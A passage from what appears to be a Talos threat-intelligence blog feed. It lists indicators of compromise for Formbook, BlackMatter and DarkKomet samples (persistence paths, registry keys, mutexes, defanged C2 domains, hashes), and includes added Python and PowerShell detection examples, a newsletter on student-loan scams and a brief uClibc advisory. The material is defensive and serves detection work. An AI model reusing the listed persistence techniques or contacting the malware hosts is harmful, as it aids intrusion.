%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat 16
%System32%\Tasks\AGP Manager 16
%System32%\Tasks\AGP Manager Task 16
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\vftwrxguvulmqhj.eu.url 16
%APPDATA%\zvgrxunhzg 16
%APPDATA%\zvgrxunhzg\vftwrxguvulmqhj.exe 16
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 16

File Hashes

134e0430e528508da28d81b2b4ece6c9273fb568a561dd507f26d666a9eb06b3 168455cbc98ae29cafcd0dc1587c449e208e5c4f8ca59420b3667c9f698a7c51 18d834d0819c859ca179e182dfb1cdedac88857124024bfce1d0368b414f50c0 3974f625f1fb08a2174021705db11ae31aa326357728ae0b1cdf102b80eb5763 3a7b0af05b1e41786cc3ff6d99d723418b89340df9ae67837001c6a31cafb4e5 6ffff5899e1086659ba7b24a72212c8531c334643757c46d4c837460c5380693 82defa5374685563056b630ef12a46f21408cace520e72af239b47afea32e8f8 8eb183d70b6842a68d17c3950b22fabbc4f2e6de8129afddcd2fb25d03fc7df9 8fe07daa7730dc17d3fdf7134e85da268a10ce447b4c3d810d433285a35cc9e6 9b46ecd089a55744c52ac2df7882a507dd1f97a3fd40805d9eccbdbbb6aed463 9dcfa90e87d3e281a4f42d3253b1ae3386930985c0ae5f9fb29e32284d7924ce aa4adb36cd79f611579e74bc562fb5f6282bce4d9cc5699e1db2aeb7a92151de b2eb77614315a5d51d44911016d2a235324af0d403de6a55262c9b1e3e74130f dc6284d0afde4a6fb81efdb496149c6b708af0f3497e96a63162131a839879c1 dff727df396c8c954148fa078980de5e7d35a2fc000bb75905b94e6a2b7f5ff0 fd70c1b68017c46b3050ee7932d3494bca6216151ddb7fcabc36f1a0649112d3

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Formbook-9970817-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: QWbqZbz
1
Mutexes Occurrences
8-3503835SZBFHHZ 1
S-1-5-21-2580483-12441345692046 1
KP30NU33--DvY01Z 1
Global\5292ba81-3a39-11ed-9660-001517e40972 1
aenDyAN 1
Global\46b1a361-3a9e-11ed-9660-001517a459ad 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
132[.]226[.]247[.]73 2
198[.]185[.]159[.]145 1
149[.]154[.]167[.]220 1
34[.]102[.]136[.]180 1
193[.]122[.]6[.]168 1
193[.]122[.]130[.]0 1
34[.]194[.]149[.]67 1
104[.]18[.]115[.]97 1
199[.]59[.]243[.]222 1
8[.]130[.]101[.]174 1
154[.]86[.]16[.]11 1
5[.]2[.]84[.]51 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]dyndns[.]org 4
icanhazip[.]com 1
api[.]telegram[.]org 1
www[.]locallywhitstable[.]co[.]uk 1
www[.]fftblogs[.]com 1
www[.]lanyuelou[.]com 1
www[.]icishopping[.]com 1
www[.]mooreandsonsak[.]net 1
www[.]junaidsubhani[.]tech 1
mail[.]boyyem[.]com[.]tr 1
Files and or directories created Occurrences
%System32%\Tasks\Updates 3
%APPDATA%\QWbqZbz 1
%APPDATA%\QWbqZbz\QWbqZbz.exe 1
%TEMP%\tmp67A.tmp 1
%APPDATA%\Hmcuym.exe 1
%System32%\Tasks\Updates\Hmcuym 1
%TEMP%\tmpBA86.tmp 1
%APPDATA%\hmlkDX.exe 1
%System32%\Tasks\Updates\hmlkDX 1
%TEMP%\tmpA204.tmp 1
%APPDATA%\idnepTZUXvdc.exe 1
%System32%\Tasks\Updates\idnepTZUXvdc 1

File Hashes

23ed86473177a66d71540c3d3ac737aa5a4d30644af5710a54ebbb5e348fa2ee 2f2e0f257103ce5edb8051b532f00204bf882cbdec68de38c6fe8ea18390f9d2 33f83dffcd247e3fefedefb2b591598eda89c7a47892d45d3051df760b60a74a 39dd36743f55ee7885cd4033e9705a0bdf2dea44416bbdc6ec6d8384c3d4e20d 53a95222b2d47e3b44240183d0eafbc7f64bcbd88bbe61af3580ab00c5f0ff85 75ce7e84cc5c6682354ceb8edc7f0b77be3ecdda500d1b0178accd0c6158f980 9da14f5b4c27946dc53283a1773e0de7246b170e11b06be9fd8c27d095054d5b a8b84e503c11cce5530fb019cd43a0306656dd22e78eac4279a332b00430ed8d a933028fe3b25879543cc98653b7cf66d5b2ef8dfbae539bb8d284a5f9cd4c9e c1226a8fab28514368ebf700c5bb48e993c05e019e86a6db8c7ccc6105696a21 ca3afdd3df6970f8026481a1d7800d86ba9852aa6a12325330a91f05aa60fb32 da67541015af6ddee5bad1432ecc3efbf85cde69c494fd1635edbae606c4a628 e7612d60681cabff03ff3bbcb0a3985a94430375e941fd8dc58e1df8151930b1 e7cbf5001db95b997003f00bcac7ca10231130e2127470ead43f6563ebcda5fc f46e6b0438003a0daeec5461f9f01dd676b39243be432365a9c59116dc6613b5

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.BlackMatter-9970818-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: GlobalAssocChangedCounter
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: DeleteFlag
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Start
16
<HKLM>\SOFTWARE\CLASSES\ISTTBGKAF\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.YYBUFJ3PN 1
<HKLM>\SOFTWARE\CLASSES\YYBUFJ3PN 1
<HKLM>\SOFTWARE\CLASSES\YYBUFJ3PN\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.YYBUFJ3PN 1
<HKLM>\SOFTWARE\CLASSES\YYBUFJ3PN\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.WQCENFTHJ 1
<HKLM>\SOFTWARE\CLASSES\WQCENFTHJ 1
<HKLM>\SOFTWARE\CLASSES\WQCENFTHJ\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.EL7OOPHD2 1
<HKLM>\SOFTWARE\CLASSES\.WQCENFTHJ 1
<HKLM>\SOFTWARE\CLASSES\EL7OOPHD2 1
<HKLM>\SOFTWARE\CLASSES\WQCENFTHJ\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\EL7OOPHD2\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.EL7OOPHD2 1
<HKLM>\SOFTWARE\CLASSES\EL7OOPHD2\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.PF4SBMUII 1
<HKLM>\SOFTWARE\CLASSES\PF4SBMUII 1
<HKLM>\SOFTWARE\CLASSES\PF4SBMUII\DEFAULTICON 1
<HKLM>\SOFTWARE\CLASSES\.PF4SBMUII 1
<HKLM>\SOFTWARE\CLASSES\PF4SBMUII\DEFAULTICON 1
Mutexes Occurrences
Global\{649F4E29-16CB-DD42-8922-9FFF0592856B} 1
Global\dc0d7207879493a1bb8d21571501a3c6 1
Global\03b84b750e7b0c183e81917fcc29ae2b 1
Global\68d784f599b693adb48d474d1722e8e9 1
Global\10b5e1850ed6703d7665a1adf3e368f4 1
Global\b36e0b827c995460aa570434a5517221 1
Global\2f26f3d09ccaf40de88c7029b61a3701 1
Global\9edc1729071cfeb8f9fe5f019ce0054a 1
Global\459bf63110ce888f28d3fd21adc5b730 1
Global\391396896a2cb3a40a83c4fbbe4675f3 1
Global\4c3e3cb8c6ed0804dcd51ba2638722cd 1
Global\0b32ca9dec339d33dd1bd5908acf4ce2 1
Global\4fe0268a70e4d52b0350071e277b194f 1
Global\ee7e1dcdc809584b5f8189eb071d9f66 1
Global\dfd07220109cd1dfb3c5268b025a72f3 1
Global\aa1f32bc8faeb8bbba36c0d7ccb5c0a0 1
Global\2c43957a37f865be08b53665ca3386d7 1
Global\d40e39e3314b8106bbc67d7dd3c2c4f4 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
test[.]white-datasheet[.]com 1
Files and or directories created Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-1002\desktop.ini 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I08BO8F.xlsx 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I11KHR4.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QKHLN.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I62TWBD.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I6FZORX.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IABMX83.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAJ2Y6R.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IALGTCS.xlsx 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAPSNOM.tsv 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGORSF7.xsn 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGTBBSA.accdb 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH49RPF.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH71GGR.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJKODPH.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJP965K.accdb 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKY5R3M.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IMYCSIT.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISLP722.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXLC77A.pdf 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXUL2U1.doc 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IYSR1FU.ppt 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ2GMJW.XLSX 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R08BO8F.xlsx 18
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R11KHR4.doc 18
*See JSON for more IOCs

File Hashes

072d0633006eeafc77c0b0144fdac84a57fa1e4f8b96d9aa33d377bd789bc533 0c4c93e6d8473b76a094a158b6dd045904bdc78e92a0bbc6faffa222df7acb6b 12b6fead37cca9d8ca4c00c2a9d56c0a402e760ab309356f078587acb7f33396 4b8fbb8a6e46b9db78bdf5ac1aa924f901270fe369411bf431fce8a46c48ca2a 50fad26d726e0af6dbed3225267934ae9ef22b31e48fc623ce93ba582a7e6110 58729cd09a74e3f69d26653b71412f9c9285ffaba52a9beb5b6d634014c98e1a 5f4ce514d8624a72d78cae3837a197ccb44cee28d4334a7641c02beb5496b3d0 6a255e2ee08490123fa594de4fe0dac977579deb541afcf455b59de2dbe05831 7d7357e4963c7d6f087a11e22d683cacf614dc7f269c2907bbb12ae30f2b007d 84d0154234d274d9188f3f1cf1852c58cfa8020a23f99812bced94d94b7f7fe5 97002e942beed0aff194d817e98fe9fa46abb30de87e893f328f01e638bbeed1 97320395d90b28ad3d5cd0ed0416b0fe379cc0cc3d65f0b27e50db4da5902ec2 b1f44fbe839e4f53bdcf5448b637ffcab3167dc931f7f7fd39738f83ae827f5e cb537a122fb0531f14c76dfd0a87cc304c26a9ab01aec46a5fd17f268ac80854 e609bf8406b61613f3e605d277cf445059974a4c71c3edd09fffae86a3c5dbfe ece96607ae4f56f49d06aa2d790f21837beec9dfcb4aeabf69f6a80965c54fdd f02cf38d417fc6e3d5f9fc05ebf49ca37e6106ffc62ce21145888338598e0c70 f1ecb57988caf26216683b1314607f06f8bf051632ff7ba73f17c2dc9b3aafcc

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.DarkKomet-9970824-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 269 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER 268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: Type
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: Start
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: ErrorControl
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: ImagePath
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: DisplayName
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: WOW64
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER
Value Name: ObjectName
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER\PARAMETERS 268
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: WindowsDriver
268
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDOWSDRIVER\PARAMETERS
Value Name: ServiceDll
268
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
19
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
10
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
5
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CACHE\CONTENT
Value Name: CachePrefix
2
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CACHE\COOKIES
Value Name: CachePrefix
2
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CACHE\HISTORY
Value Name: CachePrefix
2
Mutexes Occurrences
IEo.txt 268
quansg 265
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
183[.]110[.]225[.]61 265
112[.]175[.]100[.]207 265
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
kanmay[.]cafe24[.]com 265
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\IEn.txt 268
%SystemRoot%\SysWOW64\WindowsDriver.dll 268

File Hashes

00eb6c2df37113f0e4003b628ee1a475c9f0400829b77299c299b1e9c95c418d 01794606a7a92c15bc8ba6502162976c823ba5d4ebc3a88467791a9db3778ef7 022f8be735d9e9d3997908a93196a52a87732dad299536c069ea85feeeea160f 02b9cd9c9154a18666fd00ed905d6da9b12009853cb9f8ce2e0cf92f87bd4135 02bad02ca69901b56f664e2885bafb295121452b5e109a3874f91f1ff4ffe23e 03412cef90bb6952d8c8972f197ee6b1ea28d295c4974d1a72b3b6d9095c1269 03906939f8b5a5ed4144066225b7386aec74d4c06b5e7cb81a2974e2c687f4da 04982dc42efe67ff4158e9fd73e30d728a29c0aaddafb6ba0e6fb0985bf89098 04b5517c234f42019237157847c6f66a9f3cdb90c218516f570bd82f259884da 0726d0dfa08cff2b64c73fcd9c62f0d422f9ad79ba8cedb571a4a01cbc821604 0801823675ac75c805fa9539faffaad12984ff7b5ca048ad246b75f3f23714c0 0920c8647741aa522efbc0f346802eb49d53364de493957d1f0e8690cbcff11c 0981457a5d19d389ff9add2ab40483b1e404ef8a08576125d602533619ef5d12 0bc073e7c6861c4cfab2a4c9beb7384bb78e102902874703ee0ccef855154155 0ca9110869dd63e0118be5c519c9e143010f4cf0ba2b1101aba59249f1285b52 0dfd8aae9b3535191eeb81ec4705625e9e57a6aa135a6c782b65ba169a80f656 0e099e281e6e3032165764a030ac73046c26b488f1fd803b64fef1fafddf2775 0eaae85e998d1617c34bc7d05db597c222f5a9fe863d995234ca7d591c8fa2fc 1131ba25f0df80d98481e1e669c5fef1e3ce0b6699e6ff0bbd40c20d0649d090 117afd55818106d5d5aad61f30f5d289666244243a41f42d7a224a89588f850b 12d5290c46b571ce5724937e85afb7d7146cbedb42c295243a55c8157fd07111 12edd2a6b213d68f391c831d4fbe706d077f01efea62a2a16db47c68df21768b 1352e8b45f865f8f5069d6c0e5e0e8239229a8bfbe000b32e6614a2d764e90ff 13d20eefb6ec5d8f0f688039c40e084665f82dc528c922c6f93a758a47befed1 14a0ae7aaf08ca98ec301d106c439cf81fbb5fb074720f2a902aa867dc91cc30
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





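The roundup entries above publish contacted IP addresses, CIDR ranges and domains in defanged form (`[.]` instead of `.`) with the caveat that contact alone does not indicate maliciousness. The following is an added example, not tooling from the Talos roundup: it refangs a block in that layout, keeps CIDR ranges as networks, and checks constructed DNS and proxy log lines against the result, treating each hit as a lead to triage rather than a verdict. The excerpt reuses values from the Cerber and Nanocore entries above; the log line format is an assumption.

```python
"""Refang Talos threat-roundup IOC blocks and match them against log lines.

Added example, not code from the Talos roundup. It parses a constructed excerpt
in the same layout the roundup uses ("IP Addresses contacted ..." / "Domain
Names contacted ..." headers, one indicator per line followed by an occurrence
count) and checks constructed DNS and proxy log lines against the result.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed excerpt in the roundup layout (values taken from the Cerber and
# Nanocore entries above; the trailing number is the roundup's occurrence column).
IOC_EXCERPT = """\
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 24
149[.]202[.]64[.]0/27 24
176[.]136[.]210[.]152 16
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 24
foobosmy[.]duckdns[.]org 16
"""

# Constructed log lines; the format is an assumption, not a real product's output.
SAMPLE_LOGS = [
    "2022-09-28T10:01:02Z dns query=api.blockcypher.com client=10.0.0.5",
    "2022-09-28T10:01:09Z proxy dst=149.202.64.17:443 client=10.0.0.5",
    "2022-09-28T10:02:11Z dns query=www.example.org client=10.0.0.9",
    "2022-09-28T10:03:45Z proxy dst=176.136.210.152:8080 client=10.0.0.7",
    "2022-09-28T10:04:00Z dns query=FOOBOSMY.DUCKDNS.ORG client=10.0.0.7",
]


def refang(indicator: str) -> str:
    """Turn the roundup's defanged form (1[.]2[.]3[.]4, foo[.]bar) back into a usable value."""
    return indicator.replace("[.]", ".")


@dataclass
class IocSet:
    networks: list = field(default_factory=list)  # ip_network objects; single hosts are /32
    domains: set = field(default_factory=set)     # lower-case FQDNs

    def ip_hit(self, ip: str):
        """Return the listed network containing ip, or None."""
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            return None
        for net in self.networks:
            if addr in net:
                return net
        return None

    def domain_hit(self, name: str) -> bool:
        """Exact, case-insensitive match against the listed domains."""
        return name.lower().rstrip(".") in self.domains


def parse_ioc_block(text: str) -> IocSet:
    """Read the 'IP Addresses contacted' and 'Domain Names contacted' sections."""
    iocs = IocSet()
    section = None
    for line in text.splitlines():
        if line.startswith("IP Addresses contacted"):
            section = "ip"
            continue
        if line.startswith("Domain Names contacted"):
            section = "domain"
            continue
        if not line.strip() or section is None:
            continue
        value = refang(line.rsplit(" ", 1)[0])  # drop the occurrence count
        if section == "ip":
            # strict=False tolerates host bits set in a range such as a /22
            iocs.networks.append(ipaddress.ip_network(value, strict=False))
        else:
            iocs.domains.add(value.lower())
    return iocs


IP_RE = re.compile(r"dst=(\d{1,3}(?:\.\d{1,3}){3})")
DNS_RE = re.compile(r"query=([A-Za-z0-9.-]+)")


def scan_logs(lines, iocs: IocSet):
    """Return (line, matched indicator) for each log line that touches a listed IOC."""
    hits = []
    for line in lines:
        ip_match = IP_RE.search(line)
        net = iocs.ip_hit(ip_match.group(1)) if ip_match else None
        if net is not None:
            hits.append((line, str(net)))
            continue
        dns_match = DNS_RE.search(line)
        if dns_match and iocs.domain_hit(dns_match.group(1)):
            hits.append((line, dns_match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for line, ioc in scan_logs(SAMPLE_LOGS, parse_ioc_block(IOC_EXCERPT)):
        print(f"HIT {ioc}: {line}")
```

Entries such as `xxxxxxxxxxxxxxxx[.]1k1dxt[.]top`, where the roundup has masked a random subdomain, will not match exactly and need a suffix rule of your own; and because several listed hosts are shared infrastructure (blockchain explorers, CDN ranges), a hit should start a triage, not an alert on its own.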
Threat Source newsletter (Sept. 22, 2022) — Attackers are already using student loan relief for scams

22 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

We’ve seen attackers capitalize on the news time and again, from COVID-19 to U.S.-North Korea relationships and, of course, holiday shopping sales every November. 

So, I was far from surprised to see that attackers are already using U.S. President Joe Biden’s student loan forgiveness plan as a basis for scams and phishing emails.  

The Better Business Bureau and the U.S. Federal Trade Commission both released warnings over the past few weeks around fake offers, scams and website links related to the debt forgiveness plan, under which some borrowers will have up to $20,000 worth of loans forgiven. 

Many of these scams, coming via phone calls, text messages and emails, are promising to provide guaranteed access to the forgiveness program or early applications for a fee. (Hint: This will not work.) These attackers may also be looking to steal personal information by asking for things like names, addresses and the name of the college the target went to. 

I can already see the phishing emails now... “Click on this link NOW to apply for Biden’s loan forgiveness program” or “Act now so you can get your $10,000 check!” Even though I couldn’t find reports as of this week of this type of email being used to spread malware, I feel like it’s inevitable. 

This isn’t a new problem, either. A July study from the Tech Transparency Project found that nearly 12 percent of Google ads served related to student loans violated Google’s policies or had “scam characteristics.” 

With that in mind, I felt it was important to remind folks of a few things, with the real application for student debt forgiveness reportedly opening in early October: 

  • As of right now, Sept. 22, there is no real or formal application to have a portion of your student debt forgiven. Don’t believe anything that says otherwise. 
  • There is no way to get early access to this program. Anyone offering this for a fee is very likely a scam. 
  • The U.S. Department of Education will not reach out with a phone call to communicate regarding this program; do not provide any requested information over the phone. 
  • Just because something shows up in the mail doesn’t mean it’s legit. Attackers are also likely to send phishing letters via traditional USPS delivery methods. 
  • And, as always: If it seems too good to be true, it probably is. 

The one big thing 


Ukraine is again the target of a state-sponsored actor, with the Gamaredon APT launching information-stealing malware against organizations and users there. Gamaredon is a well-known actor that’s been around for several years and usually aligns with Russian state interests. The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine. Talos researchers discovered the use of a custom-made information stealer implant that can exfiltrate victim files of interest and deploy additional payloads as directed by the attackers. 

Why do I care? 

Gamaredon is actively targeting Ukrainian entities, specifically government organizations and critical infrastructure. These are all crucial industries to protect during Russia’s invasion of Ukraine, as they’ll likely be targeted regularly by state-sponsored actors. And as we outlined in last week’s Talos Takes, Gamaredon’s activities are not likely to remain isolated to Ukraine. 

So now what?

There are new Cisco Secure product protections in place to protect against this actor’s activities. Additionally, if you fear you could be targeted by this campaign, there are two artifacts to scan for on the system that can indicate a compromise: 
  • A registry key is created under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the name "Windows Task" for persistence. 
  • A mutex is created with the name Global\flashupdate_r. 
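One way to check a Windows host for those two artifacts, as an added example that is not part of the Talos post: the script looks up the "Windows Task" value under the current user's Run key and tries to open the Global\flashupdate_r mutex, which only succeeds while a process holding it is running. The output layout and the choice to treat an access-denied open as a finding are assumptions of this example.

```powershell
# Added example (not from the Talos post): check this host for the two
# Gamaredon artifacts named above. Run in an elevated PowerShell session.

$runKey    = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$valueName = 'Windows Task'           # persistence value name from the post
$mutexName = 'Global\flashupdate_r'   # mutex name from the post

$findings = @()

# 1. Persistence: look for the Run value and report the command it launches.
$runValues = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($runValues -and ($runValues.PSObject.Properties.Name -contains $valueName)) {
    $findings += [pscustomobject]@{
        Artifact = 'Run key value'
        Name     = $valueName
        Detail   = $runValues.$valueName
    }
}

# 2. Mutex: OpenExisting succeeds only if a running process already created it.
try {
    $m = [System.Threading.Mutex]::OpenExisting($mutexName)
    $m.Dispose()
    $findings += [pscustomobject]@{
        Artifact = 'Mutex'
        Name     = $mutexName
        Detail   = 'present (held by a running process)'
    }
} catch [System.Threading.WaitHandleCannotBeOpenedException] {
    # Not present: nothing to record.
} catch [System.UnauthorizedAccessException] {
    # Exists but this session lacks rights to open it; still worth recording.
    $findings += [pscustomobject]@{
        Artifact = 'Mutex'
        Name     = $mutexName
        Detail   = 'present (access denied on open)'
    }
}

if ($findings.Count -eq 0) {
    Write-Output "No Gamaredon artifacts found on $env:COMPUTERNAME"
} else {
    $findings | Format-Table -AutoSize
}
```

The Run-key check covers only the user running the script; to sweep every profile on the host, repeat it against each loaded hive under HKU: (or each NTUSER.DAT you load). The mutex check is point-in-time, so a host that has rebooted since infection will show only the registry artifact.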


Top security headlines from the week


Rideshare app Uber blamed the Lapsus$ ransomware group for a recent data breach. The company said the actor gained access to multiple internal Uber systems after stealing a third-party contractor's credentials and then tricking that user into approving a multi-factor authentication request. Uber engaged the U.S. Department of Justice and the FBI shortly after learning about the breach and is still investigating it. However, it does not appear that attackers accessed any customer or user data stored by its cloud providers, though they did download some internal messages and information from an internal finance team. (ZDNet, Washington Post)

New York’s Suffolk County is still recovering from a cyber attack that’s affected multiple areas of the local government. The county’s 911 system was still offline as of Tuesday, with responders forced to switch to pen and paper for tracking emergency calls. They’ve also had to enlist the help of the New York City Police Department to assist with background checks. The attackers may have also stolen and leaked some residents’ personal information and have allegedly posted images of stolen documents on the dark web. The adversaries say they’ve demanded an unspecified “small amount” of money for the return of access to its computers. (NBC 4 New York, Newsday)

The ChromeLoader malware is more dangerous than ever, according to new research from VMWare and Microsoft. Security researchers at the companies say the malware — which started as a browser-hijacking credential stealer — is now being used as a tool to deliver ransomware and steal sensitive information. The updated version of ChromeLoader has been used in hundreds of attacks over the past few weeks targeting enterprise networks in the education, government, health care and business services industries. Attackers are disguising ChromeLoader as legitimate Chrome browser services and plugins, such as OpenSubtitles, a site designed to help users to find subtitles for popular TV shows and movies. (Dark Reading, The Register)


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

GovWare 2022 (Oct. 18 - 20)
Sands Expo & Convention Centre, Singapore 

Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 8a5f8ed00adbdfb1ab8a2bb8016aafc1   
Typical Filename: RunFallGuys.exe 
Claimed Product: N/A 
Detection Name: W32.Auto:c326d1.in03.Talos 

MD5: 2c8ea737a232fd03ab80db672d50a17a     
Typical Filename: LwssPlayer.scr     
Claimed Product: 梦想之巅幻灯播放器     
Detection Name: Auto.125E12.241442.in02 

MD5: 8c69830a50fb85d8a794fa46643493b2 
Typical Filename: AAct.exe 
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

Vulnerability Spotlight: Vulnerabilities in popular library affect Unix-based devices

22 September 2022 at 09:00



Lilith >_> of Cisco Talos discovered these vulnerabilities. 

Cisco Talos recently discovered a memory corruption vulnerability in the uClibc library that could affect any Unix-based device that uses this library. uClibc and uClibc-ng are lightweight replacements for the popular glibc library, the GNU Project's implementation of the C standard library. 

TALOS-2022-1517 (CVE-2022-29503 - CVE-2022-29504) is a memory corruption vulnerability in uClibc and uClibc-ng that can occur if a malicious user repeatedly creates threads. 

